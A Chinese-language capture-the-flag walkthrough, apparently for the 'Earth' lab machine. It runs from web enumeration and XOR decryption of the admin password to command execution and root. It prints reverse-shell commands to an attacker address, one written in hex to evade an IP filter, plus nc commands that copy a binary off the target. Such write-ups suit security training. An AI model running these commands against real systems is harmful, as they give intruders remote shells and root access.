Earth
信息搜集
存活检测
详细扫描
添加 DNS 解析
vim /etc/hosts
网页信息搜集
-
访问 https://earth.local
-
访问 https://terratest.earth.local
后台网页
-
admin 页面
-
robots 页面
http 无法扫描出而 https 可以扫描出
-
提示访问
/testingnotes.后缀
数量多可编辑脚本,数量少挨个测试
最后测试出 /testingnotes.txt
-
提示了管理员为 terra,加密算法为 XOR,测试加密文件为 testdata.txt(密码本)
访问https://terratest.earth.local/testdata.txt
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
密码解密
-
测试刚开始在主页上的三个密文
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45 2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
-
解密结果
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
发现为重复的字符串
earthclimatechangebad4humans
-
尝试使用用户名 terra 密码 earthclimatechangebad4humans 登录 admin 页面
webshell
-
登录管理员页面后出现一个命令框
-
尝试命令
-
反弹 shell
-
kali 开启监听
-
命令框输入反弹命令
bash -c 'bash -i &>/dev/tcp/10.4.7.132/8888 0>1'
无法执行
-
-
寻找失败原因
-
ping 127.0.0.1
显示禁止远程连接 -
ping localhost
则一直转圈加载 -
ping localhost -c 2
指定 ping 两次稍微等待则回显结果说明过滤掉了 ip 地址
-
-
尝试将 ip 地址转换为 16 禁止进行绕过
bash -c 'bash -i >& /dev/tcp/0x0A.0x04.0x07.0x84/8888 0>&1'
-
成功链接
提权
suid 权限
-
sudo -l
-
查找 suid 权限
strace 调试
-
strace是一个用于跟踪和调试应用程序的工具。它可以捕获并显示应用程序在执行期间与操作系统之间的系统调用和信号交互。通过使用strace,您可以了解应用程序的行为,包括它打开、读取和写入的文件、它发送和接收的网络数据、它创建和终止的进程,以及它与操作系统之间的其他交互。
strace的基本语法是:
strace [选项] [命令]
-
靶机上调试
显示无此命令
-
下载到 kali 调试
kali
nc -nlvp 1234 >reset_root
靶机
nc 10.4.7.132 1234 < /usr/bin/reset_root
显示缺少三个文件
-
靶机中创建三个文件
touch /dev/shm/kHgTFI5G touch /dev/shm/Zw7bV9U5 touch /tmp/kcM0Wewe
-
再次运行命令符
/usr/bin/reset_root
-
显示 root 密码修改为 Earth
-
切换 root
总结
- XOR 解码
- ip 转换
- strace 调试